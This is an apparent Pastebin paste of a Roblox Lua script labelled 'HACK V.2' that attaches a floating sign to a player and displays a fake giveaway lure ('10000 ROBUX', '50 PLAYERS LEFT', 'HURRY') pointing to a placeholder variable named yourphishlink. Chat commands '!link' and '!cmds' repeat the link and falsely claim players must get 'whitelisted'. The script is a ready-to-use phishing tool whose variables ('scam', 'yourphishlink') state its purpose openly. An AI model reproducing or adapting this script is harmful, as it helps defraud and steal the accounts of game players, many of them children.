Advertisement
Wweroblox12121212

Untitled

Jan 15th, 2018
265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.09 KB | None | 0 0
  1. GUI=Instance.new('SurfaceGui', x)
  2. GUI.Face = 'Front'
  3.  
  4. Text=Instance.new('TextLabel', GUI)
  5. Text.Text = 'HACK V.2'
  6. Text.TextColor3 = Color3.new(255,255,255)
  7. Text.TextStrokeColor3 = Color3.new(0,0,0)
  8. Text.TextStrokeTransparency = 0.5
  9. Text.Font = 'Code'
  10. Text.Size = UDim2.new(1, 0, 0.5, 0)
  11. Text.BackgroundTransparency = 1
  12. Text.Position = UDim2.new(0, 0, 0.63, 0)
  13. Text.TextScaled = true
  14. Text.Rotation = -900
  15.  
  16. Text2=Instance.new('TextLabel', GUI)
  17. Text2.Text = " GO TO THIS LINK : "..yourphishlink.." 50 PLAYERS LEFT TO WIN 10000 ROBUX!!! WILL EXPIRE IN 1 WEEK HURRY!! ITS YOUR CHANCE IF YOU CANT VIEW IT CHAT !link"
  18. Text2.TextColor3 = Color3.new(255,255,255)
  19. Text2.TextStrokeColor3 = Color3.new(0,0,0)
  20. Text2.TextStrokeTransparency = 0.5
  21. Text2.Font = 'Code'
  22. Text2.Size = UDim2.new(1, 0, 0.6, 0)
  23. Text2.BackgroundTransparency = 1
  24. Text2.Position = UDim2.new(0, 0, 0.12, 0)
  25. Text2.TextScaled = true
  26. Text2.Rotation = -900
  27.  
  28. ---900
  29.  
  30. function Change()
  31. wait(0.001)
  32. x.Transparency = 0.1
  33. wait(0.001)
  34. x.Transparency = 0.2
  35. wait(0.001)
  36. x.Transparency = 0.3
  37. wait(0.001)
  38. x.Transparency = 0.4
  39. wait(0.001)
  40. x.Transparency = 0.5
  41. wait(0.001)
  42. x.Transparency = 0.6
  43. wait(0.001)
  44. x.Transparency = 0.7
  45. wait(0.001)
  46. x.Transparency = 0.8
  47. wait(0.001)
  48. x.Transparency = 0.9
  49. wait(0.001)
  50. x.Transparency = 1
  51. wait(0.5)
  52. x.Transparency = 0.9
  53. wait(0.001)
  54. x.Transparency = 0.8
  55. wait(0.001)
  56. x.Transparency = 0.7
  57. wait(0.001)
  58. x.Transparency = 0.6
  59. wait(0.001)
  60. x.Transparency = 0.5
  61. wait(0.001)
  62. x.Transparency = 0.4
  63. end
  64.  
  65. game.Players[troslado].Chatted:connect(function(msg)
  66. if msg == "!link" then
  67. Text.Text = ''
  68. Text2.Text = ''
  69. Change()
  70. Text.Text = 'HACK V.2'
  71. Text2.Text = " "..yourphishlink.." "
  72. end
  73. end)
  74.  
  75. game.Players[troslado].Chatted:connect(function(msg)
  76. if msg == "!cmds" then
  77. Text.Text = ''
  78. Text2.Text = ''
  79. Change()
  80. Text2.Text = 'You need to get whitelisted first! Please chat !link'
  81. Text.Text = 'HACK V.2'
  82. end
  83. end)
  84.  
  85. while wait() do
  86. x.CFrame = scam.Torso.CFrame*CFrame.new(0, 0, -7)
  87. x.CFrame = x.CFrame * CFrame.Angles(91,0,0)
  88. if scam.Humanoid.Health == 0 then
  89. x:Destroy()
  90. end
  91. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement